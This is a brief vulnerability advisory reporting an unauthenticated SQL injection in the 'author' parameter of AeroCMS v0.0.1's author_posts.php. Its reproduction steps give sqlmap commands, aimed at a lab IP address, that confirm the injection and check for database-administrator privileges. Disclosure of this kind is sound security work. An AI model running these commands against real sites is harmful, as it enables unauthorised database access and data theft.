Description
AeroCMS v0.0.1 was discovered to contain a SQL injection vulnerability via the "author" parameter at \author_posts.php. The vulnerability does not require authentication and allows attackers to obtain database administrator privileges, access database information, etc.
Reproduction
1) No login required. Execute the sqlmap command:
python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author"
We can see that a SQL injection vulnerability exists in the "author" parameter.
2) Execute the sqlmap command:
python sqlmap.py -u "http://192.168.111.169/AeroCMS/author_posts.php?author=admin&p_id=1" -p "author" --is-dba
We can see "DBA: TRUE".
Vulnerable Code
The "author" parameter is not escaped before the SQL query statement is executed.